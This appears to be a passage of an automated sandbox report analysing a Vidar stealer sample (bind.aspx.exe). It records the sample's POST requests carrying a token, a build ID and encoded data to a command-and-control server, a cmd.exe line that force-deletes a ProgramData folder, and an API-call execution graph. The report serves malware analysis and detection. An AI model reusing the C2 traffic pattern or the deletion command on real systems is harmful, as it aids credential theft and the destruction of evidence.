2024-09-28 01:29:58 UTC | 15080 | OUT | Data Raw: 41 44 37 58 33 50 38 41 7a 4f 71 38 55 65 4b 4c 48 57 39 4d 6a 74 72 61 4b 34 56 31 6d 45 68 4d 71 71 42 67 4b 77 37 45 2b 74 63 6c 53 77 71 39 77 59 52 42 44 4e 4b 5a 39 33 6b 69 4f 4a 6d 38 7a 62 39 37 62 67 63 34 37 34 6f 6b 56 34 70 33 67 6c 6a 6b 69 6d 54 37 30 63 69 46 57 58 36 67 38 31 33 59 61 6c 53 6f 52 39 6e 42 33 36 6e 6c 59 37 45 56 38 56 4e 56 61 73 62 57 56 74 45 37 64 2b 76 71 4a 52 53 64 71 4f 31 64 5a 77 43 30 6c 46 46 41 42 52 52 53 48 70 51 4d 57 6b 6f 6f 6f 41 4b 4b 4b 53 67 41 6f 6f 6f 6f 47 46 4a 53 30 6c 41 42 52 52 52 51 4d 4b 53 67 30 55 41 46 46 46 4a 51 4d 4b 4b 4b 4b 41 45 6f 6f 6f 6f 47 46 4a 51 61 4b 41 43 6b 6f 4e 46 4d 59 55 6c 4c 53 55 67 43 6b 4e 4c 53 66 6a 54 47 46 46 46 46 41 43 55 55 55 55 41 4a 52 52 52 51 4d 44 53
Data Ascii: AD7X3P8AzOq8UeKLHW9MjtraK4V1mEhMqqBgKw7E+tclSwq9wYRBDNKZ93kiOJm8zb97bgc474okV4p3gljkimT70ciFWX6g813YalSoR9nB36nlY7EV8VNVasbWVtE7d+vqJRSdqO1dZwC0lFFABRRSHpQMWkoooAKKKSgAooooGFJS0lABRRRQMKSg0UAFFFJQMKKKKAEooooGFJQaKACkoNFMYUlLSUgCkNLSfjTGFFFFACUUUUAJRRRQMDS
2024-09-28 01:30:00 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Sep 2024 01:30:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-28 01:30:00 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49722 | 135.181.31.18 | 443 | 6376 | C:\Users\user\Desktop\bind.aspx.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-28 01:30:00 UTC | 305 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAK
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 135.181.31.18
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-28 01:30:00 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74
Data Ascii: ------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------AFHDHCAAKECFIDHIEBAKCont
2024-09-28 01:30:01 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Sep 2024 01:30:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-28 01:30:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49724 | 135.181.31.18 | 443 | 6376 | C:\Users\user\Desktop\bind.aspx.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-28 01:30:02 UTC | 305 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 135.181.31.18
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-28 01:30:02 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74
Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------EBAFBGIDHCBFHIECFCBGCont
2024-09-28 01:30:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Sep 2024 01:30:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-28 01:30:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 4
Start time: 21:29:04
Start date: 27/09/2024
Path: C:\Users\user\Desktop\bind.aspx.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\bind.aspx.exe"
Imagebase: 0x340000
File size: 5'424'128 bytes
MD5 hash: 9C49281D063296A545C79BF288D4C3BF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000000.1269068193.000000000035E000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 13
Start time: 23:02:03
Start date: 27/09/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCAEHDBAAECB" & exit
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                    Start time:23:02:03
                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                    Start time:23:02:03
                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:timeout /t 10
                                                                                                                                                                                    Imagebase:0xbf0000
                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true


Execution Graph

Execution Coverage: 6.6%
Dynamic/Decrypted Code Coverage: 20.3%
Signature Coverage: 6.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 83
88323->88324 88325 3429d4 88324->88325 88326 3420e8 80 API calls 88325->88326 88327 3429e9 88326->88327 88328 3420e8 80 API calls 88327->88328 88329 342a02 88328->88329 88330 3420e8 80 API calls 88329->88330 88331 342a18 88330->88331 88332 3420e8 80 API calls 88331->88332 88333 342a2e 88332->88333 88334 3420e8 80 API calls 88333->88334 88335 342a43 88334->88335 88336 3420e8 80 API calls 88335->88336 88337 342a58 88336->88337 88338 3420e8 80 API calls 88337->88338 88339 342a6e 88338->88339 88340 3420e8 80 API calls 88339->88340 88341 342a87 88340->88341 88342 3420e8 80 API calls 88341->88342 88343 342a9c 88342->88343 88344 3420e8 80 API calls 88343->88344 88345 342ab1 88344->88345 88346 3420e8 80 API calls 88345->88346 88347 342ac7 88346->88347 88348 3420e8 80 API calls 88347->88348 88349 342adc 88348->88349 88350 3420e8 80 API calls 88349->88350 88351 342af1 88350->88351 88352 3420e8 80 API calls 88351->88352 88353 342b09 88352->88353 88354 3420e8 80 API calls 88353->88354 88355 342b1e 88354->88355 88356 3420e8 80 API calls 88355->88356 88357 342b34 88356->88357 88358 3420e8 80 API calls 88357->88358 88359 342b4a 88358->88359 88360 3420e8 80 API calls 88359->88360 88361 342b60 88360->88361 88362 3420e8 80 API calls 88361->88362 88363 342b76 88362->88363 88364 3420e8 80 API calls 88363->88364 88365 342b8f 88364->88365 88366 3420e8 80 API calls 88365->88366 88367 342ba5 88366->88367 88368 3420e8 80 API calls 88367->88368 88369 342bbb 88368->88369 88370 3420e8 80 API calls 88369->88370 88371 342bd1 88370->88371 88372 3420e8 80 API calls 88371->88372 88373 342be7 88372->88373 88374 3420e8 80 API calls 88373->88374 88375 342bfd 88374->88375 88376 3420e8 80 API calls 88375->88376 88377 342c16 88376->88377 88378 3420e8 80 API calls 88377->88378 88379 342c2c 88378->88379 88380 3420e8 80 API calls 88379->88380 88381 342c42 88380->88381 88382 3420e8 80 API calls 88381->88382 88383 342c57 88382->88383 88384 3420e8 80 API calls 88383->88384 88385 342c6d 88384->88385 88386 
3420e8 80 API calls 88385->88386 88387 342c83 88386->88387 88388 3420e8 80 API calls 88387->88388 88389 342c9c 88388->88389 88390 3420e8 80 API calls 88389->88390 88391 342cb2 88390->88391 88392 3420e8 80 API calls 88391->88392 88393 342cc8 88392->88393 88394 3420e8 80 API calls 88393->88394 88395 342cde 88394->88395 88396 3420e8 80 API calls 88395->88396 88397 342cf4 88396->88397 88398 3420e8 80 API calls 88397->88398 88399 342d0a 88398->88399 88400 3420e8 80 API calls 88399->88400 88401 342d23 88400->88401 88402 3420e8 80 API calls 88401->88402 88403 342d39 88402->88403 88404 3420e8 80 API calls 88403->88404 88405 342d4f 88404->88405 88406 3420e8 80 API calls 88405->88406 88407 342d65 88406->88407 88408 3420e8 80 API calls 88407->88408 88409 342d7b 88408->88409 88410 3420e8 80 API calls 88409->88410 88411 342d91 88410->88411 88412 3420e8 80 API calls 88411->88412 88413 342da9 88412->88413 88414 3420e8 80 API calls 88413->88414 88415 342dbe 88414->88415 88416 3420e8 80 API calls 88415->88416 88417 342dd4 88416->88417 88418 3420e8 80 API calls 88417->88418 88419 342dea 88418->88419 88420 3420e8 80 API calls 88419->88420 88421 342e00 88420->88421 88422 3420e8 80 API calls 88421->88422 88423 342e15 88422->88423 88424 3420e8 80 API calls 88423->88424 88425 342e2e 88424->88425 88426 3420e8 80 API calls 88425->88426 88427 342e44 88426->88427 88428 3420e8 80 API calls 88427->88428 88429 342e5a 88428->88429 88430 3420e8 80 API calls 88429->88430 88431 342e6f 88430->88431 88432 3420e8 80 API calls 88431->88432 88433 342e85 88432->88433 88434 3420e8 80 API calls 88433->88434 88435 342e9b 88434->88435 88436 3420e8 80 API calls 88435->88436 88437 342eb4 88436->88437 88438 3420e8 80 API calls 88437->88438 88439 342eca 88438->88439 88440 3420e8 80 API calls 88439->88440 88441 342ee0 88440->88441 88442 3420e8 80 API calls 88441->88442 88443 342ef6 88442->88443 88444 3420e8 80 API calls 88443->88444 88445 342f0c 88444->88445 88446 3420e8 80 API calls 88445->88446 88447 342f22 
88446->88447 88448 3420e8 80 API calls 88447->88448 88449 342f3b 88448->88449 88450 3420e8 80 API calls 88449->88450 88451 342f51 88450->88451 88452 3420e8 80 API calls 88451->88452 88453 342f67 88452->88453 88454 3420e8 80 API calls 88453->88454 88455 342f7d 88454->88455 88456 3420e8 80 API calls 88455->88456 88457 342f93 88456->88457 88458 3420e8 80 API calls 88457->88458 88459 342fa8 88458->88459 88460 3420e8 80 API calls 88459->88460 88461 342fc1 88460->88461 88462 3420e8 80 API calls 88461->88462 88463 342fd6 88462->88463 88464 3420e8 80 API calls 88463->88464 88465 342fec 88464->88465 88466 3420e8 80 API calls 88465->88466 88467 343002 88466->88467 88468 3420e8 80 API calls 88467->88468 88469 343018 88468->88469 88470 3420e8 80 API calls 88469->88470 88471 34302e 88470->88471 88472 3420e8 80 API calls 88471->88472 88473 343046 88472->88473 88474 3420e8 80 API calls 88473->88474 88475 34305c 88474->88475 88476 3420e8 80 API calls 88475->88476 88477 343072 88476->88477 88478 3420e8 80 API calls 88477->88478 88479 343088 88478->88479 88480 3420e8 80 API calls 88479->88480 88481 34309e 88480->88481 88482 3420e8 80 API calls 88481->88482 88483 3430b4 88482->88483 88484 3420e8 80 API calls 88483->88484 88485 3430cd 88484->88485 88486 3420e8 80 API calls 88485->88486 88487 3430e3 88486->88487 88488 3420e8 80 API calls 88487->88488 88489 3430f9 88488->88489 88490 3420e8 80 API calls 88489->88490 88491 34310f 88490->88491 88492 3420e8 80 API calls 88491->88492 88493 343125 88492->88493 88494 3420e8 80 API calls 88493->88494 88495 34313b 88494->88495 88496 3420e8 80 API calls 88495->88496 88497 343154 88496->88497 88498 3420e8 80 API calls 88497->88498 88499 343169 88498->88499 88500 3420e8 80 API calls 88499->88500 88501 34317f 88500->88501 88502 3420e8 80 API calls 88501->88502 88503 343195 88502->88503 88504 3420e8 80 API calls 88503->88504 88505 3431ab 88504->88505 88506 3420e8 80 API calls 88505->88506 88507 3431c1 88506->88507 88508 3420e8 80 API calls 
88507->88508 88509 3431da 88508->88509 88510 3420e8 80 API calls 88509->88510 88511 3431f0 88510->88511 88512 3420e8 80 API calls 88511->88512 88513 343206 88512->88513 88514 3420e8 80 API calls 88513->88514 88515 34321c 88514->88515 88516 3420e8 80 API calls 88515->88516 88517 343231 88516->88517 88518 3420e8 80 API calls 88517->88518 88519 343247 88518->88519 88520 3420e8 80 API calls 88519->88520 88521 343260 88520->88521 88522 3420e8 80 API calls 88521->88522 88523 343276 88522->88523 88524 3420e8 80 API calls 88523->88524 88525 34328c 88524->88525 88526 3420e8 80 API calls 88525->88526 88527 3432a2 88526->88527 88528 3420e8 80 API calls 88527->88528 88529 3432b8 88528->88529 88530 3420e8 80 API calls 88529->88530 88531 3432ce 88530->88531 88532 3420e8 80 API calls 88531->88532 88533 3432e7 88532->88533 88534 3420e8 80 API calls 88533->88534 88535 3432fd 88534->88535 88536 3420e8 80 API calls 88535->88536 88537 343313 88536->88537 88538 3420e8 80 API calls 88537->88538 88539 343329 88538->88539 88540 3420e8 80 API calls 88539->88540 88541 34333e 88540->88541 88542 3420e8 80 API calls 88541->88542 88543 343354 88542->88543 88544 3420e8 80 API calls 88543->88544 88545 34336d 88544->88545 88546 3420e8 80 API calls 88545->88546 88547 343383 88546->88547 88548 3420e8 80 API calls 88547->88548 88549 343399 88548->88549 88550 3420e8 80 API calls 88549->88550 88551 3433af 88550->88551 88552 3420e8 80 API calls 88551->88552 88553 3433c5 88552->88553 88554 3420e8 80 API calls 88553->88554 88555 3433db 88554->88555 88556 3420e8 80 API calls 88555->88556 88557 3433f4 88556->88557 88558 3420e8 80 API calls 88557->88558 88559 34340a 88558->88559 88560 3420e8 80 API calls 88559->88560 88561 343420 88560->88561 88562 3420e8 80 API calls 88561->88562 88563 343436 88562->88563 88564 3420e8 80 API calls 88563->88564 88565 34344b 88564->88565 88566 3420e8 80 API calls 88565->88566 88567 343461 88566->88567 88568 3420e8 80 API calls 88567->88568 88569 343479 88568->88569 88570 
3420e8 80 API calls 88569->88570 88571 34348f 88570->88571 88572 3420e8 80 API calls 88571->88572 88573 3434a5 88572->88573 88574 3420e8 80 API calls 88573->88574 88575 3434bb 88574->88575 88576 3420e8 80 API calls 88575->88576 88577 3434d1 88576->88577 88578 3420e8 80 API calls 88577->88578 88579 3434e7 88578->88579 88580 3420e8 80 API calls 88579->88580 88581 343500 88580->88581 88582 3420e8 80 API calls 88581->88582 88583 343516 88582->88583 88584 3420e8 80 API calls 88583->88584 88585 34352c 88584->88585 88586 3420e8 80 API calls 88585->88586 88587 343542 88586->88587 88588 3420e8 80 API calls 88587->88588 88589 343558 88588->88589 88590 3420e8 80 API calls 88589->88590 88591 34356e 88590->88591 88592 3420e8 80 API calls 88591->88592 88593 343587 88592->88593 88594 3420e8 80 API calls 88593->88594 88595 34359d 88594->88595 88596 3420e8 80 API calls 88595->88596 88597 3435b3 88596->88597 88598 3420e8 80 API calls 88597->88598 88599 3435c8 88598->88599 88600 3420e8 80 API calls 88599->88600 88601 3435de 88600->88601 88602 3420e8 80 API calls 88601->88602 88603 3435f4 88602->88603 88604 3420e8 80 API calls 88603->88604 88605 34360d 88604->88605 88606 3420e8 80 API calls 88605->88606 88607 343623 88606->88607 88608 3420e8 80 API calls 88607->88608 88609 343639 88608->88609 88610 3420e8 80 API calls 88609->88610 88611 34364e 88610->88611 88612 3420e8 80 API calls 88611->88612 88613 343664 88612->88613 88614 3420e8 80 API calls 88613->88614 88615 34367a 88614->88615 88616 3420e8 80 API calls 88615->88616 88617 343693 88616->88617 88618 3420e8 80 API calls 88617->88618 88619 3436a9 88618->88619 88620 3420e8 80 API calls 88619->88620 88621 3436bf 88620->88621 88622 3420e8 80 API calls 88621->88622 88623 3436d5 88622->88623 88624 3420e8 80 API calls 88623->88624 88625 3436eb 88624->88625 88626 3420e8 80 API calls 88625->88626 88627 343700 88626->88627 88628 3420e8 80 API calls 88627->88628 88629 343719 88628->88629 88630 3420e8 80 API calls 88629->88630 88631 34372f 
88630->88631 88632 3420e8 80 API calls 88631->88632 88633 343745 88632->88633 88634 3420e8 80 API calls 88633->88634 88635 34375b 88634->88635 88636 3420e8 80 API calls 88635->88636 88637 343771 88636->88637 88638 3420e8 80 API calls 88637->88638 88639 343787 88638->88639 88640 3420e8 80 API calls 88639->88640 88641 34379f 88640->88641 88642 3420e8 80 API calls 88641->88642 88643 3437b5 88642->88643 88644 3420e8 80 API calls 88643->88644 88645 3437ca 88644->88645 88646 3420e8 80 API calls 88645->88646 88647 3437df 88646->88647 88648 3420e8 80 API calls 88647->88648 88649 3437f5 88648->88649 88650 3420e8 80 API calls 88649->88650 88651 34380a 88650->88651 88652 3420e8 80 API calls 88651->88652 88653 343823 88652->88653 88654 3420e8 80 API calls 88653->88654 88655 343839 88654->88655 88656 3420e8 80 API calls 88655->88656 88657 34384f 88656->88657 88658 3420e8 80 API calls 88657->88658 88659 343865 88658->88659 88660 3420e8 80 API calls 88659->88660 88661 34387b 88660->88661 88662 3420e8 80 API calls 88661->88662 88663 343891 88662->88663 88664 3420e8 80 API calls 88663->88664 88665 3438a9 88664->88665 88666 3420e8 80 API calls 88665->88666 88667 3438be 88666->88667 88668 3420e8 80 API calls 88667->88668 88669 3438d3 88668->88669 88670 3420e8 80 API calls 88669->88670 88671 3438e9 88670->88671 88672 3420e8 80 API calls 88671->88672 88673 3438ff 88672->88673 88674 3420e8 80 API calls 88673->88674 88675 343914 88674->88675 88676 3420e8 80 API calls 88675->88676 88677 34392d 88676->88677 88678 3420e8 80 API calls 88677->88678 88679 343943 88678->88679 88680 3420e8 80 API calls 88679->88680 88681 343958 88680->88681 88682 3420e8 80 API calls 88681->88682 88683 34396e 88682->88683 88684 3420e8 80 API calls 88683->88684 88685 343984 88684->88685 88686 3420e8 80 API calls 88685->88686 88687 343999 88686->88687 88688 3420e8 80 API calls 88687->88688 88689 3439b2 88688->88689 88690 3420e8 80 API calls 88689->88690 88691 3439c8 88690->88691 88692 3420e8 80 API calls 
88691->88692 88693 3439de 88692->88693 88694 3420e8 80 API calls 88693->88694 88695 3439f3 88694->88695 88696 3420e8 80 API calls 88695->88696 88697 343a09 88696->88697 88698 3420e8 80 API calls 88697->88698 88699 343a1f 88698->88699 88700 3420e8 80 API calls 88699->88700 88701 343a38 88700->88701 88702 3420e8 80 API calls 88701->88702 88703 343a4e 88702->88703 88704 3420e8 80 API calls 88703->88704 88705 343a64 88704->88705 88706 3420e8 80 API calls 88705->88706 88707 343a79 88706->88707 88708 3420e8 80 API calls 88707->88708 88709 343a8f 88708->88709 88710 3420e8 80 API calls 88709->88710 88711 343aa5 88710->88711 88712 3420e8 80 API calls 88711->88712 88713 343abe 88712->88713 88714 3420e8 80 API calls 88713->88714 88715 343ad3 88714->88715 88716 3420e8 80 API calls 88715->88716 88717 343ae9 88716->88717 88718 3420e8 80 API calls 88717->88718 88719 343aff 88718->88719 88720 3420e8 80 API calls 88719->88720 88721 343b15 88720->88721 88722 3420e8 80 API calls 88721->88722 88723 343b2b 88722->88723 88724 3420e8 80 API calls 88723->88724 88725 343b44 88724->88725 88726 3420e8 80 API calls 88725->88726 88727 343b5a 88726->88727 88728 3420e8 80 API calls 88727->88728 88729 343b6f 88728->88729 88730 3420e8 80 API calls 88729->88730 88731 343b84 88730->88731 88732 3420e8 80 API calls 88731->88732 88733 343b99 88732->88733 88734 3420e8 80 API calls 88733->88734 88735 343bae 88734->88735 88736 3420e8 80 API calls 88735->88736 88737 343bc7 88736->88737 88738 3420e8 80 API calls 88737->88738 88739 343bdd 88738->88739 88740 3420e8 80 API calls 88739->88740 88741 343bf2 88740->88741 88742 3420e8 80 API calls 88741->88742 88743 343c08 88742->88743 88744 3420e8 80 API calls 88743->88744 88745 343c1d 88744->88745 88746 3420e8 80 API calls 88745->88746 88747 343c33 88746->88747 88748 3420e8 80 API calls 88747->88748 88749 343c4c 88748->88749 88750 3420e8 80 API calls 88749->88750 88751 343c61 88750->88751 88752 3420e8 80 API calls 88751->88752 88753 343c76 88752->88753 88754 
3420e8 80 API calls 88753->88754 88755 343c8c 88754->88755 88756 3420e8 80 API calls 88755->88756 88757 343ca2 88756->88757 88758 3420e8 80 API calls 88757->88758 88759 343cb8 88758->88759 88760 3420e8 80 API calls 88759->88760 88761 343cd1 88760->88761 88762 3420e8 80 API calls 88761->88762 88763 343ce7 88762->88763 88764 3420e8 80 API calls 88763->88764 88765 343cfd 88764->88765 88766 3420e8 80 API calls 88765->88766 88767 343d13 88766->88767 88768 3420e8 80 API calls 88767->88768 88769 343d28 88768->88769 88770 3420e8 80 API calls 88769->88770 88771 343d3d 88770->88771 88772 3420e8 80 API calls 88771->88772 88773 343d58 88772->88773 88774 3420e8 80 API calls 88773->88774 88775 343d6d 88774->88775 88776 3420e8 80 API calls 88775->88776 88777 343d83 88776->88777 88778 3420e8 80 API calls 88777->88778 88779 343d99 88778->88779 88780 3420e8 80 API calls 88779->88780 88781 343daf 88780->88781 88782 3420e8 80 API calls 88781->88782 88783 343dc5 88782->88783 88784 3420e8 80 API calls 88783->88784 88785 343dde 88784->88785 88786 3420e8 80 API calls 88785->88786 88787 343df4 88786->88787 88788 3420e8 80 API calls 88787->88788 88789 343e09 88788->88789 88790 3420e8 80 API calls 88789->88790 88791 343e1e 88790->88791 88792 3420e8 80 API calls 88791->88792 88793 343e34 88792->88793 88794 3420e8 80 API calls 88793->88794 88795 343e49 88794->88795 88796 3420e8 80 API calls 88795->88796 88797 343e62 88796->88797 88798 3420e8 80 API calls 88797->88798 88799 343e78 88798->88799 88800 3420e8 80 API calls 88799->88800 88801 343e8d 88800->88801 88802 3420e8 80 API calls 88801->88802 88803 343ea2 88802->88803 88804 3420e8 80 API calls 88803->88804 88805 343eb8 88804->88805 88806 3420e8 80 API calls 88805->88806 88807 343ece 88806->88807 88808 3420e8 80 API calls 88807->88808 88809 343ee7 88808->88809 88810 355edc 88809->88810 88811 355ee9 50 API calls 88810->88811 88812 35635b 9 API calls 88810->88812 88811->88812 88813 3563fc GetProcAddress GetProcAddress GetProcAddress 
GetProcAddress GetProcAddress 88812->88813 88814 35646a 88812->88814 88813->88814 88815 356477 8 API calls 88814->88815 88816 35652a 88814->88816 88815->88816 88817 3565a1 88816->88817 88818 356533 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88816->88818 88819 356633 88817->88819 88820 3565ae 6 API calls 88817->88820 88818->88817 88821 356640 9 API calls 88819->88821 88822 35670a 88819->88822 88820->88819 88821->88822 88823 356781 88822->88823 88824 356713 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88822->88824 88825 3567b3 88823->88825 88826 35678a GetProcAddress GetProcAddress 88823->88826 88824->88823 88827 3567e5 88825->88827 88828 3567bc GetProcAddress GetProcAddress 88825->88828 88826->88825 88829 3568d1 88827->88829 88830 3567f2 10 API calls 88827->88830 88828->88827 88831 356931 88829->88831 88832 3568da GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88829->88832 88830->88829 88833 35694c 88831->88833 88834 35693a GetProcAddress 88831->88834 88832->88831 88835 356955 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88833->88835 88836 3569ac 88833->88836 88834->88833 88835->88836 88837 3569b5 GetProcAddress 88836->88837 88838 3569c6 88836->88838 88837->88838 88838->87881 88840 34fe64 CloseHandle 88839->88840 88841 34fe38 Process32Next 88839->88841 88840->88077 88841->88840 88842 34fe4a StrCmpCA 88841->88842 88842->88841 88843 34fe5e 88842->88843 88843->88841 90174 359027 88844->90174 88846 3590a0 88846->88082 88848 34e57d lstrcpyA 88847->88848 88849 34f6c8 88848->88849 88850 34e57d lstrcpyA 88849->88850 88851 34f6d6 GetSystemTime 88850->88851 88852 34f6f3 88851->88852 88852->87884 88855 34e6a7 88853->88855 88854 34e6cb 88854->87902 88855->88854 88856 34e6b9 lstrcpyA lstrcatA 88855->88856 88856->88854 88858 34e5b4 lstrcpyA 88857->88858 88859 341334 88858->88859 88860 34e5b4 lstrcpyA 88859->88860 88861 341340 88860->88861 88862 34e5b4 lstrcpyA 88861->88862 88863 34134c 
88862->88863 88864 34e5b4 lstrcpyA 88863->88864 88865 341364 88864->88865 88866 351f08 88865->88866 88867 351f1b 88866->88867 88868 34e5f1 2 API calls 88867->88868 88869 351f29 88868->88869 88870 34e5f1 2 API calls 88869->88870 88871 351f32 88870->88871 88872 34e5f1 2 API calls 88871->88872 88873 351f3b 88872->88873 88874 34e57d lstrcpyA 88873->88874 88875 351f48 88874->88875 88876 34e57d lstrcpyA 88875->88876 88877 351f51 88876->88877 88878 34e57d lstrcpyA 88877->88878 88879 351f5a 88878->88879 88880 34e57d lstrcpyA 88879->88880 88881 351f63 88880->88881 88882 34e57d lstrcpyA 88881->88882 88883 351f6c 88882->88883 88884 34e57d lstrcpyA 88883->88884 88893 351f75 88884->88893 88885 342039 lstrcpyA 88885->88893 88886 342078 lstrcpyA 88886->88893 88887 351509 28 API calls 88887->88893 88888 352042 StrCmpCA 88888->88893 88889 3520a0 StrCmpCA 88890 352663 88889->88890 88889->88893 88891 34e63b lstrcpyA 88890->88891 88892 35266f 88891->88892 88894 342078 lstrcpyA 88892->88894 88893->88885 88893->88886 88893->88887 88893->88888 88893->88889 88896 3521d8 StrCmpCA 88893->88896 88900 34204e lstrcpyA 88893->88900 88903 342063 lstrcpyA 88893->88903 88908 352310 StrCmpCA 88893->88908 88919 34e63b lstrcpyA 88893->88919 88920 34208d lstrcpyA 88893->88920 88923 352448 StrCmpCA 88893->88923 88927 35217a StrCmpCA 88893->88927 88932 35257a StrCmpCA 88893->88932 88934 34e5b4 lstrcpyA 88893->88934 88938 3420a2 lstrcpyA 88893->88938 